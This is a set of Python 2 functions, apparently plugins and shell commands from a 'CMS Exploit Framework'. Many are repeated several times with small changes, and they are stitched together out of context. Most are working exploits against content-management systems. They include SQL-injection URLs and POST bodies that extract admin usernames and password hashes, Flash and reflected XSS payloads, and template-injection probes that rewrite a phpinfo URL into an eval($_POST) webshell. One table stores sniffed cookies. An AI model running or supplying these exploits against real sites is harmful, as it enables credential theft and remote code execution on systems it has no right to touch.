def verify(URL):
    """
    Probe ``URL`` with a plain GET and log whether the marker string appears.

    :param URL: full address to request; no timeout is set, so the call can
                block indefinitely on an unresponsive host
    :return: None on both paths -- the outcome is only logged, so a caller that
             tests the return value always sees a falsy result
    """
    r=requests.get(URL)
    r.close()
    # Substring test on the raw body (``content`` is bytes on Python 3; this
    # comparison only works as written on Python 2).
    if "Request" in r.content:
        logger.success("Step 1: Exploitable!")
    else:
        logger.error("Step 1: It's not exploitable!")
def exploit(URL):
    """
    Run the ``grouppermission`` check against ``URL`` and report what it finds.

    :param URL: site base address; ``/faq.php?action=grouppermission`` is appended
    :return: ``"<URL>: <username>|<md5>"`` when ``verify`` is truthy, else None
    """
    url = URL + "/faq.php?action=grouppermission"
    # NOTE(review): relies on verify() returning a truthy value on success and
    # on get_hash() returning a mapping with "username" and "md5" keys --
    # confirm against the module's own definitions.
    if verify(url):
        manager_hash = get_hash(url)
        logger.success("Username: %s" % manager_hash["username"])
        logger.success("Hash: %s" % manager_hash["md5"])
        return "%s: %s|%s" % (URL, manager_hash["username"], manager_hash["md5"])
 def do_vulns(self, arg):
     """
     Show, clear or export the stored vulnerability records.

     :param arg: string of shell-style arguments: empty lists every record,
                 ``-d`` clears the store, ``-o <plugin>`` appends that
                 plugin's records to ``vulns.txt`` in the working directory
     :return: None
     """
     tokens = arg.split()
     if not tokens:
         # Listing mode: two-column table of (plugin, vuln) pairs.
         rows = self.show_vulns()
         print "\nVulns\n=====\n"
         for left, right in (("Plugin", "Vuln"), ("------", "----")):
             print "%-40s%s" % (left, right)
         for plugin, vuln in rows:
             print "%-40s%s" % (plugin, vuln)
         print
         return
     mode = tokens[0]
     if mode == "-d":
         self.clear_vulns()
         logger.success("Clear database successfully.")
     elif mode == "-o":
         # Export mode: records are fetched before the file is opened so a
         # store failure never leaves a half-written section behind.
         plugin_name = tokens[1]
         rows = self.show_vulns()
         with open("vulns.txt", "a") as out:
             out.write(os.linesep)
             out.write("[%s]" % plugin_name + os.linesep)
             out.writelines(
                 row[1] + os.linesep for row in rows if row[0] == plugin_name
             )
             out.write(os.linesep)
         logger.success("Save vulns successfully.")
def exploit(URL, Thread):
    """
    Report whether ``URL`` answers a plain GET with HTTP 200.

    :param URL: address to request exactly as given (no timeout is set)
    :param Thread: not used by this function
    :return: the string ``"200"`` on a 200 response, otherwise None
    """
    logger.process("Request " + URL)
    resp = requests.get(URL)
    resp.close()
    if resp.status_code != 200:
        return None
    logger.success("200")
    return "200"
 def do_vulns(self, arg):
     """
     List, clear or export the recorded vulnerabilities.

     :param arg: shell-style argument string; no arguments prints the table,
                 ``-d`` clears the store, ``-o <plugin>`` appends one plugin's
                 entries to ``vulns.txt`` in the current directory
     :return: None
     """
     words = arg.split()
     if not words:
         entries = self.show_vulns()
         print "\nVulns\n=====\n"
         header = (("Plugin", "Vuln"), ("------", "----"))
         for first, second in header:
             print "%-40s%s" % (first, second)
         for plugin, vuln in entries:
             print "%-40s%s" % (plugin, vuln)
         print
     elif words[0] == "-d":
         self.clear_vulns()
         logger.success("Clear database successfully.")
     elif words[0] == "-o":
         plugin_name = words[1]
         # Fetch before opening so the file is untouched if the store fails.
         entries = self.show_vulns()
         selected = [entry[1] for entry in entries if entry[0] == plugin_name]
         with open("vulns.txt", "a") as out:
             out.write(os.linesep)
             out.write("[%s]" % plugin_name + os.linesep)
             for text in selected:
                 out.write(text + os.linesep)
             out.write(os.linesep)
         logger.success("Save vulns successfully.")
def exploit(URL, Thread):
    """
    Check whether a plain GET of ``URL`` returns HTTP 200.

    :param URL: address requested as-is; no timeout is applied
    :param Thread: accepted but not used here
    :return: ``"200"`` when the status code is 200, else None
    """
    logger.process("Request "+URL)
    response = requests.get(URL)
    response.close()
    reachable = response.status_code == 200
    if reachable:
        logger.success("200")
    return "200" if reachable else None
def exploit(URL):
    """
    Run the ``grouppermission`` check against ``URL`` and report what it finds.

    :param URL: site base address; ``/faq.php?action=grouppermission`` is appended
    :return: ``"<URL>: <username>|<md5>"`` when ``verify`` is truthy, else None
    """
    url = URL + "/faq.php?action=grouppermission"
    # NOTE(review): assumes verify() returns a truthy value on success and that
    # get_hash() returns a mapping with "username" and "md5" keys -- confirm.
    if verify(url):
        manager_hash = get_hash(url)
        logger.success("Username: %s" % manager_hash["username"])
        logger.success("Hash: %s" % manager_hash["md5"])
        return "%s: %s|%s" % (URL, manager_hash["username"],
                              manager_hash["md5"])
 def log(self, request, result):
     """
     Thread-pool callback: store the first truthy ``result`` and stop waiting.

     :param request: the work request that produced ``result``; not used here
     :param result: worker return value; falsy values are ignored
     :return: None
     :raises threadpool.NoResultsPending: after a truthy result has been stored
     """
     if not result:
         return
     self.result = "%s: %s" % (self.url, result)
     logger.success(self.result)
     raise threadpool.NoResultsPending
 def do_rebuild_db(self, line):
     """
     Drop and rebuild the plugin database.

     :param line: raw command text from the shell; not used
     :return: None
     """
     for message in ("Clear current database", "Rebuild database"):
         logger.process(message)
     self.db_rebuild()
     logger.success("OK")
def exploit(URL):
	"""
	Call ``verify`` on ``URL`` and report the two values it returns.

	:param URL: target address, passed straight to ``verify``
	:return: ``"<URL>: <first>|<second>"`` when ``verify`` yields an indexable
	         pair, otherwise None
	"""
	logger.process("Requesting target site")
	try:
		result=verify(URL)
		logger.success("Username: %s" % result[0])
		logger.success("password: %s" % result[1])
		return "%s: %s|%s" % (URL, result[0], result[1])
	except:
		# NOTE(review): bare except hides every failure -- a None result from
		# verify, network errors and even KeyboardInterrupt -- and returns None.
		pass
 def log(self, request, result):
     """
     Thread-pool callback that records a truthy ``result`` and halts the pool.

     :param request: originating work request; unused
     :param result: value produced by the worker; ignored when falsy
     :return: None
     :raises threadpool.NoResultsPending: once ``self.result`` has been set
     """
     if result:
         summary = "%s: %s" % (self.url, result)
         self.result = summary
         logger.success(summary)
         raise threadpool.NoResultsPending
 def do_rebuild_db(self, line):
     """
     Clear the current database and rebuild it from the plugin set.

     :param line: shell argument text; ignored
     :return: None
     """
     logger.process("Clear current database")
     logger.process("Rebuild database")
     self.db_rebuild()
     logger.success("OK")
     return None
def exploit(URL):
    """
    Fetch the ``flvplayer.swf`` URL and compare the body's MD5 to a fixed digest.

    :param URL: site base address; the SWF path and query string are appended
    :return: the probed ``url`` when the digest matches, otherwise None
    """
    url = URL + "/static/image/common/flvplayer.swf?file=1.flv&" \
                "linkfromdisplay=true&link=javascript:alert(1);"
    logger.process("Requesting target site")
    r = requests.get(url, timeout=5)
    r.close()
    # Byte-exact match against a hard-coded digest; the provenance of the
    # value is not recorded here, so any other build of the file is a miss.
    if hashlib.md5(r.content).hexdigest() == "7d675405ff7c94fa899784b7ccae68d3":
        logger.success("Exploitable!")
        logger.success(url)
        return url
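 def start(self):
     """
     Start the scan: run the directory scan, report its results, then the XSS scan.

     Stores the directory-scan result on ``self.intresting_urls`` (attribute
     name kept as-is for compatibility with other callers).
     """
     status("Starting directory scan")
     self.intresting_urls = self._dirscan()
     # ``!=`` replaces the original ``is not 0``: identity comparison against
     # an int literal is unreliable and a SyntaxWarning on Python 3.8+.
     if self.intresting_urls != 0:
         success("found %d urls to take a look at..." %
                 (len(self.intresting_urls)))
     # presumably each entry is a dict mapping a URL to an int status/score
     # (the "%d" format below requires an int) -- confirm against _dirscan.
     # NOTE(review): when _dirscan returns 0 the loop below raises TypeError,
     # as it did before this change.
     for urldic in self.intresting_urls:
         for key in urldic:
             verbose(self, "[%d] %s" % (urldic[key], key))
     self._xss_scan()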
def get_hash(url):
    """
    Request ``url`` and pull two ``|``-separated fields out of a MySQL
    "Duplicate entry" error message in the response.

    :param url: full address to request; no timeout is set
    :return: ``(username, password)`` when the pattern and both fields are
             present, otherwise None
    """
    r=requests.get(url)
    r.close()
    try:
        # The captured group is split on "|"; fields 1 and 2 are used, so the
        # value is presumably "|<user>|<pass>" with an empty leading field.
        result=re.search(r"Duplicate entry \'(.*?)' for key", r.content).group(1)
        username=result.split("|")[1]
        password=result.split("|")[2]
        logger.success("Step 2:")
        return (username,password)
    except:
        # NOTE(review): bare except also masks AttributeError (no match) and
        # IndexError (too few fields) from the parsing above, as well as
        # KeyboardInterrupt -- narrow it when this is revisited.
        logger.error("Step 2: Finish! It's not exploitable!\nIf step 1 is exploitable,you can try it by hand!\n")
def exploit(URL):
    """
    Run ``verify`` against ``URL`` and then ``get_hash`` against the search URL.

    :param URL: site base address; the ``/plus/search.php`` query is appended
    :return: ``"<URL>: <first>|<second>"`` when ``get_hash`` returns an
             indexable pair, otherwise None
    """
    url=URL+"/plus/search.php?keyword=as&typeArr[111%3D@`\\\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\\\'`+]=a"
    logger.process("Requesting target site")
    # The return value of verify() is discarded; it only logs.
    verify(URL)
    try:
        result=get_hash(url)
        logger.success("Username: %s" % result[0])
        logger.success("password: %s" % result[1])
        return "%s: %s|%s" % (URL, result[0], result[1])
    except:
        # NOTE(review): bare except silently turns a None result, network
        # errors and KeyboardInterrupt into a None return.
        pass
def exploit(URL):
    """
    Fetch the ``swfupload.swf`` URL and compare the body's MD5 to a fixed digest.

    :param URL: site base address; the SWF path and query string are appended
    :return: the probed ``url`` when the digest matches, otherwise None
    """
    url = URL + "/plugins/kindeditor/plugins/multiimage/images/swfupload.swf" \
                "?movieName=\"]%29;}catch%28e%29{}if%28!self.a%29self.a=!ale" \
                "rt%281%29;//"
    logger.process("Requesting target site")
    r = requests.get(url, timeout=5)
    r.close()
    # Byte-exact match against a hard-coded digest whose provenance is not
    # recorded here; any other build of the file is reported as a miss.
    if hashlib.md5(r.content).hexdigest() == "3a1c6cc728dddc258091a601f28a9c12":
        logger.success("Exploitable!")
        logger.success(url)
        return url
def exploit(URL):
    """
    Fetch the ``swfupload.swf`` URL and compare the body's MD5 to a fixed digest.

    :param URL: site base address; the SWF path and query string are appended
    :return: the probed ``url`` when the digest matches, otherwise None
    """
    url = URL + "/plugins/kindeditor/plugins/multiimage/images/swfupload.swf" \
                "?movieName=\"]%29;}catch%28e%29{}if%28!self.a%29self.a=!ale" \
                "rt%281%29;//"
    logger.process("Requesting target site")
    r = requests.get(url, timeout=5)
    r.close()
    # Byte-exact comparison with a hard-coded digest; provenance not recorded.
    if hashlib.md5(
            r.content).hexdigest() == "3a1c6cc728dddc258091a601f28a9c12":
        logger.success("Exploitable!")
        logger.success(url)
        return url
 def do_values(self, arg):
     """
     Print the recorded vulnerabilities as a table, or clear them with ``-d``.

     :param arg: shell-style argument string; empty prints the table,
                 ``-d`` clears the store, anything else is ignored
     :return: None
     """
     tokens = arg.split()
     if tokens:
         if tokens[0] == "-d":
             self.clear_vulns()
             logger.success("Clear database successfully.")
         return
     rows = self.show_vulns()
     print "\nVulns\n=====\n"
     # Header uses a 42-wide column, the rows a 40-wide one, as in the original.
     print "%-42s%s" % ("标题", "漏洞")
     print "%-40s%s" % ("------", "----")
     for plugin, vuln in rows:
         print "%-40s%s" % (plugin, vuln)
     print
def verify(URL):
	"""
	Probe the ``/plus/search.php`` endpoint and, depending on which marker the
	response contains, hand one of two follow-up URLs to ``get_hash``.

	:param URL: site base address; no timeout is set on any request
	:return: whatever ``get_hash`` returns for the matched step, or None when
	         neither marker is present
	"""
	r=requests.get(URL+"/plus/search.php?keyword=as&typeArr[%20uNion%20]=a")
	r.close()
	# Substring tests on the raw body; ``content`` is bytes on Python 3, so
	# these comparisons only work as written on Python 2.
	if "Request Error step 1" in r.content:
		logger.success("Step 1: Exploitable!")
		result=get_hash(URL+"/plus/search.php?keyword=as&typeArr[111%3D@`\\\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\\\'`+]=a")
		return result
	elif "Request Error step 2" in r.content:
		logger.success("Step 2: Exploitable!")
		result=get_hash(URL+"/plus/search.php?keyword=as&typeArr[111%3D@`\\\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\\\'`+]=a")
		return result
	else:
		logger.error("It's not exploitable!")
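 def init(self):
     """
     Create the ``info`` and ``sniff`` tables on ``self.cu``, dropping any
     existing ones first.

     When the drop/create sequence fails (presumably because the tables do
     not exist yet -- confirm), the tables are created from scratch instead.

     :return: None
     """
     try:
         self.cu.execute("DROP TABLE info;")
         self.cu.execute("DROP TABLE sniff")
         self.cu.execute("CREATE TABLE info (SESSION STRING,STATUS STRING,URL STRING,DATA TEXT);")
         self.cu.execute("CREATE TABLE sniff (SESSION STRING,METHOD STRING,URL STRING,COOKIE STRING,DATA TEXT);")
         logger.success("初始化成功")
     except Exception:
         # Narrowed from a bare ``except`` so KeyboardInterrupt/SystemExit
         # still propagate instead of being turned into a "rebuild".
         # NOTE(review): if only the second DROP failed, ``info`` still exists
         # and the first CREATE below raises again; flow kept as the original.
         logger.error("初始化错误")
         logger.info("从新建立数据库")
         self.cu.execute("CREATE TABLE info (SESSION STRING,STATUS STRING,URL STRING,DATA TEXT);")
         self.cu.execute("CREATE TABLE sniff (SESSION STRING,METHOD STRING,URL STRING,COOKIE STRING,DATA TEXT);")
         logger.success("建立成功")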
def exploit(URL):
    """
    Request ``URL`` with a hex-escaped ``s`` query parameter and check whether
    the decoded markup is reflected verbatim in the response.

    :param URL: site base address; the ``/?s=`` query is appended
    :return: the probed ``url`` when the reflected string is found, else None
    """
    url = URL + r"/?s=\\x3c\\x2f\\x74\\x69\\x74\\x6c\\x65\\x3e\\x3c\\x73" \
                r"\\x63\\x72\\x69\\x70\\x74\\x3e\\x61\\x6c\\x65\\x72\\x74" \
                r"\\x28\\x64\\x6f\\x63\\x75\\x6d\\x65\\x6e\\x74\\x2e\\x64" \
                r"\\x6f\\x6d\\x61\\x69\\x6e\\x29\\x3c\\x2f\\x73\\x63\\x72" \
                r"\\x69\\x70\\x74\\x3e"
    logger.process("Requesting target site")
    r = requests.get(url, timeout=5)
    r.close()
    # Raw-string literals above carry a literal backslash pair per byte; the
    # check below looks for the decoded form in the text body.
    if "</title><script>alert(document.domain)</script>" in r.text:
        logger.success("Exploitable!")
        logger.success(url)
        return url
def exploit(URL):
    """
    Request ``URL`` with a hex-escaped ``s`` query parameter and check whether
    the decoded markup is reflected verbatim in the response.

    :param URL: site base address; the ``/?s=`` query is appended
    :return: the probed ``url`` when the reflected string is found, else None
    """
    url = URL + r"/?s=\\x3c\\x2f\\x74\\x69\\x74\\x6c\\x65\\x3e\\x3c\\x73" \
                r"\\x63\\x72\\x69\\x70\\x74\\x3e\\x61\\x6c\\x65\\x72\\x74" \
                r"\\x28\\x64\\x6f\\x63\\x75\\x6d\\x65\\x6e\\x74\\x2e\\x64" \
                r"\\x6f\\x6d\\x61\\x69\\x6e\\x29\\x3c\\x2f\\x73\\x63\\x72" \
                r"\\x69\\x70\\x74\\x3e"
    logger.process("Requesting target site")
    r = requests.get(url, timeout=5)
    r.close()
    # Looks for the decoded form of the escaped query in the text body.
    if "</title><script>alert(document.domain)</script>" in r.text:
        logger.success("Exploitable!")
        logger.success(url)
        return url
 def do_update(self, line):
     """
     Fetch the remote plugin list, download what is missing locally and
     rebuild the database.

     :param line: shell argument text; not used
     :return: None
     """
     for banner in ("", "Attempting to update the CMS Exploit Framework", ""):
         logger.process(banner)
     logger.process("Downloading plugin list")
     remote = self.down_plugin_list()
     logger.process("Getting local plugin list")
     local = self.get_local_plugin_list()
     logger.process("Comparing and updating")
     added = self.down_plugins(remote, local)
     logger.success("New plugins: %s" % (str(added),))
     # Refresh the database so the new plugins are visible to the shell.
     self.do_rebuild_db("")
 def do_update(self, line):
     """
     Update the framework: compare the remote and local plugin lists,
     download the missing plugins, then rebuild the database.

     :param line: shell argument text; ignored
     :return: None
     """
     process = logger.process
     process("")
     process("Attempting to update the CMS Exploit Framework")
     process("")
     process("Downloading plugin list")
     remote_plugins = self.down_plugin_list()
     process("Getting local plugin list")
     local_plugins = self.get_local_plugin_list()
     process("Comparing and updating")
     new_plugins = self.down_plugins(remote_plugins, local_plugins)
     logger.success("New plugins: %s" % str(new_plugins))
     self.do_rebuild_db("")
def verify(url):
    """
    POST a crafted ``gids`` form to ``url`` and check for a MySQL error string.

    :param url: full address of the endpoint to POST to
    :return: True when "MySQL Query Error" appears in the response text;
             otherwise None (falsy), not False
    """
    logger.process("Requesting target site")
    r = requests.post(url,
                      data={
                          "gids[99]":
                          "'",
                          "gids[100][0]":
                          ") and (select 1 from (select count(*"
                          "),concat(version(),floor(rand(0)*2))"
                          "x from information_schema.tables gro"
                          "up by x)a)#"
                      },
                      timeout=5)
    r.close()
    if "MySQL Query Error" in r.text:
        logger.success("Exploitable!")
        return True
def verify(url):
    """
    POST a crafted ``gids`` form to ``url`` and check for a MySQL error string.

    :param url: full address of the endpoint to POST to
    :return: True when "MySQL Query Error" appears in the response text;
             otherwise None (falsy), not False
    """
    logger.process("Requesting target site")
    r = requests.post(
        url,
        data={
            "gids[99]": "'",
            "gids[100][0]": ") and (select 1 from (select count(*"
            "),concat(version(),floor(rand(0)*2))"
            "x from information_schema.tables gro"
            "up by x)a)#",
        },
        timeout=5,
    )
    r.close()
    if "MySQL Query Error" in r.text:
        logger.success("Exploitable!")
        return True
def exploit(URL):
    """
    Request an ``Index/index/name`` path carrying a template expression and
    check whether the ``phpinfo()`` page is rendered.

    :param URL: site base address; the path is appended
    :return: a rewritten ``url`` when the phpinfo title is found, else None
    """
    url = URL + "/index.php/Index/index/name/${@phpinfo()}"
    logger.process("Requesting target site")
    r = requests.get(url, timeout=5)
    r.close()
    if "<title>phpinfo()</title>" in r.text:
        logger.success("Exploitable!")
        logger.success("Phpinfo: %s" % url)
        # The returned value is the probe URL with the expression swapped;
        # it is not requested here.
        url = url.replace("@phpinfo()", "@print(eval($_POST[chu]))")
        logger.success("Webshell: %s" % url)
        return url
def exploit(URL):
    """
    Request an ``Index/index/name`` path carrying a template expression and
    check whether the ``phpinfo()`` page is rendered.

    :param URL: site base address; the path is appended
    :return: a rewritten ``url`` when the phpinfo title is found, else None
    """
    url = URL + "/index.php/Index/index/name/${@phpinfo()}"
    logger.process("Requesting target site")
    r = requests.get(url, timeout=5)
    r.close()
    if "<title>phpinfo()</title>" in r.text:
        logger.success("Exploitable!")
        logger.success("Phpinfo: %s" % url)
        # Only a string substitution; the rewritten URL is not requested.
        url = url.replace("@phpinfo()", "@print(eval($_POST[chu]))")
        logger.success("Webshell: %s" % url)
        return url
def exploit(URL):
    """
    Request the ``home/search`` URL and parse two fields out of the response
    when the marker ``chuishere`` is present.

    :param URL: site base address; the search path and query are appended
    :return: ``"<URL>: <username>|<md5>"`` on a match, otherwise None
    """
    url = URL + "/index.php/home/search?q=1'union select 1,2,3,4,concat" \
                "(0x6368756973686572657e7e7e,username,0x7e,password,0x7" \
                "e7e7e),6,7,8,9,0,1,2,3,4,5,6,7 from stb_users limit 1-" \
                "- &sitesearch=http://127.0.0.1/startbbs/"
    logger.process("Requesting target site")
    r = requests.get(url, timeout=5)
    r.close()
    if "chuishere" in r.text:
        logger.success("Exploitable!")
        # Takes the text between the first two "~~~" and expects exactly one
        # "~" inside it; any other shape raises ValueError on unpacking.
        username, md5 = r.text.split("~~~")[1].split("~")
        logger.success("Username: %s" % username)
        logger.success("Hash: %s" % md5)
        return "%s: %s|%s" % (URL, username, md5)
def exploit(URL, Cookie):
    """
    Request the ``message&a=show`` URL with the given cookies and parse two
    fields out of the response when the marker ``handsomechu`` is present.

    :param URL: site base address; the query path is appended
    :param Cookie: cookies passed through to ``requests.get``
    :return: ``"<URL>: <username>|<password>"`` on a match, otherwise None
    """
    logger.process("Requesting " + URL)
    url = URL + "/?m=message&a=show&uid=%27)%20union%20select%20concat(0x686" \
                "16e64736f6d65636875,user_name,0x7e7e7e,password,0x68616e647" \
                "36f6d65636875)%20from%20et_users%20limit%201,1%23"
    r = requests.get(url=url, cookies=Cookie, timeout=5)
    r.close()
    if "handsomechu" in r.text:
        logger.success("Exploitable!")
        # Text between the first two markers must contain exactly one "~~~";
        # otherwise the two-name unpacking below raises ValueError.
        handsomechu = r.text.split("handsomechu")[1].split("~~~")
        username, password = handsomechu
        logger.success("Username: %s" % username)
        logger.success("Hash: %s" % password)
        return "%s: %s|%s" % (URL, username, password)
def exploit(URL):
    """
    Request the ``home/search`` URL and parse two fields out of the response
    when the marker ``chuishere`` is present.

    :param URL: site base address; the search path and query are appended
    :return: ``"<URL>: <username>|<md5>"`` on a match, otherwise None
    """
    url = URL + "/index.php/home/search?q=1'union select 1,2,3,4,concat" \
                "(0x6368756973686572657e7e7e,username,0x7e,password,0x7" \
                "e7e7e),6,7,8,9,0,1,2,3,4,5,6,7 from stb_users limit 1-" \
                "- &sitesearch=http://127.0.0.1/startbbs/"
    logger.process("Requesting target site")
    r = requests.get(url, timeout=5)
    r.close()
    if "chuishere" in r.text:
        logger.success("Exploitable!")
        # Expects exactly one "~" between the first two "~~~"; any other
        # shape raises ValueError on unpacking.
        username, md5 = r.text.split("~~~")[1].split("~")
        logger.success("Username: %s" % username)
        logger.success("Hash: %s" % md5)
        return "%s: %s|%s" % (URL, username, md5)
def exploit(URL, Cookie):
    """
    Request the ``topic&a=topic`` URL with the given cookies and parse two
    fields out of the response when the marker ``handsomechu`` is present.

    :param URL: site base address; the query path is appended
    :param Cookie: cookies passed through to ``requests.get``
    :return: ``"<URL>: <username>|<password>"`` on a match, otherwise None
    """
    logger.process("Requesting " + URL)
    url = URL + "/?m=topic&a=topic&keyword=a%27%20and%201=2%20union%20select" \
                "%201,2,3,concat(0x68616e64736f6d65636875,user_name,0x7e7e7e," \
                "password,0x68616e64736f6d65636875),5%20from%20et_users%23"
    r = requests.get(url=url, cookies=Cookie, timeout=5)
    r.close()
    if "handsomechu" in r.text:
        logger.success("Exploitable!")
        # The segment between the first two markers must hold exactly one
        # "~~~"; otherwise the unpacking below raises ValueError.
        handsomechu = r.text.split("handsomechu")[1].split("~~~")
        username, password = handsomechu
        logger.success("Username: %s" % username)
        logger.success("Hash: %s" % password)
        return "%s: %s|%s" % (URL, username, password)
def exploit(URL):
    """
    Try two candidate ``search.html`` URLs in turn and stop at the first whose
    response renders the ``phpinfo()`` page.

    :param URL: site base address; each candidate path is appended to it
    :return: a rewritten ``url`` for the first matching candidate, or None
             when neither matches
    """
    urls = [
        URL + "/index.php/search.html?keyword=%24%7B%40phpinfo%28%29%7D",
        URL + "/search.html?keyword=%24%7B%40phpinfo%28%29%7D",
    ]

    # zip(range(1, 3), ...) numbers the two candidates 1 and 2 for the log.
    for i, url in zip(range(1, 3), urls):
        logger.process("Testing URL %d..." % i)
        r = requests.get(url, timeout=5)
        r.close()
        if "<title>phpinfo()</title>" in r.text:
            logger.success("Exploitable!")
            logger.success("Phpinfo: %s" % url)
            # String substitution only; the rewritten URL is not requested.
            url = url.replace("%24%7B%40phpinfo%28%29%7D", "%24%7B%40eval(%24_POST%5B'chu'%5D)%7D")
            logger.success("WebShell: %s" % url)
            return url
def exploit(URL):
    """
    Try two candidate ``search.html`` URLs in turn and stop at the first whose
    response renders the ``phpinfo()`` page.

    :param URL: site base address; each candidate path is appended to it
    :return: a rewritten ``url`` for the first matching candidate, or None
             when neither matches
    """
    urls = [
        URL + "/index.php/search.html?keyword=%24%7B%40phpinfo%28%29%7D",
        URL + "/search.html?keyword=%24%7B%40phpinfo%28%29%7D"
    ]

    # The candidates are numbered 1 and 2 in the progress log.
    for i, url in zip(range(1, 3), urls):
        logger.process("Testing URL %d..." % i)
        r = requests.get(url, timeout=5)
        r.close()
        if "<title>phpinfo()</title>" in r.text:
            logger.success("Exploitable!")
            logger.success("Phpinfo: %s" % url)
            # String substitution only; the rewritten URL is not requested.
            url = url.replace("%24%7B%40phpinfo%28%29%7D",
                              "%24%7B%40eval(%24_POST%5B'chu'%5D)%7D")
            logger.success("WebShell: %s" % url)
            return url
def exploit(URL, Cookie):
    """
    Request the ``message&a=show`` URL with the given cookies and parse two
    fields out of the response when the marker ``handsomechu`` is present.

    :param URL: site base address; the query path is appended
    :param Cookie: cookies passed through to ``requests.get``
    :return: ``"<URL>: <username>|<password>"`` on a match, otherwise None
    """
    logger.process("Requesting "+URL)
    url = URL + "/?m=message&a=show&uid=%27)%20union%20select%20concat(0x686" \
                "16e64736f6d65636875,user_name,0x7e7e7e,password,0x68616e647" \
                "36f6d65636875)%20from%20et_users%20limit%201,1%23"
    r = requests.get(
        url=url,
        cookies=Cookie,
        timeout=5
    )
    r.close()
    if "handsomechu" in r.text:
        logger.success("Exploitable!")
        # The segment between the first two markers must hold exactly one
        # "~~~"; otherwise the unpacking below raises ValueError.
        handsomechu = r.text.split("handsomechu")[1].split("~~~")
        username, password = handsomechu
        logger.success("Username: %s" % username)
        logger.success("Hash: %s" % password)
        return "%s: %s|%s" % (URL, username, password)
def exploit(URL, Cookie):
    """
    Request the ``topic&a=topic`` URL with the given cookies and parse two
    fields out of the response when the marker ``handsomechu`` is present.

    :param URL: site base address; the query path is appended
    :param Cookie: cookies passed through to ``requests.get``
    :return: ``"<URL>: <username>|<password>"`` on a match, otherwise None
    """
    logger.process("Requesting "+URL)
    url = URL + "/?m=topic&a=topic&keyword=a%27%20and%201=2%20union%20select" \
                "%201,2,3,concat(0x68616e64736f6d65636875,user_name,0x7e7e7e," \
                "password,0x68616e64736f6d65636875),5%20from%20et_users%23"
    r = requests.get(
        url=url,
        cookies=Cookie,
        timeout=5
    )
    r.close()
    if "handsomechu" in r.text:
        logger.success("Exploitable!")
        # The segment between the first two markers must hold exactly one
        # "~~~"; otherwise the unpacking below raises ValueError.
        handsomechu = r.text.split("handsomechu")[1].split("~~~")
        username, password = handsomechu
        logger.success("Username: %s" % username)
        logger.success("Hash: %s" % password)
        return "%s: %s|%s" % (URL, username, password)
 def do_init_db(self, line):
     """
     Initialise the database via ``self.db_init`` and report completion.

     :param line: shell argument text; not used
     :return: None
     """
     logger.process("初始化数据库")
     self.db_init()
     logger.success("OK")
     return None
 def do_rebuild_db(self, line):
     """
     Empty and rebuild the database via ``self.db_rebuild``.

     :param line: shell argument text; not used
     :return: None
     """
     for step in ("清空数据库", "重建数据库"):
         logger.process(step)
     self.db_rebuild()
     logger.success("OK")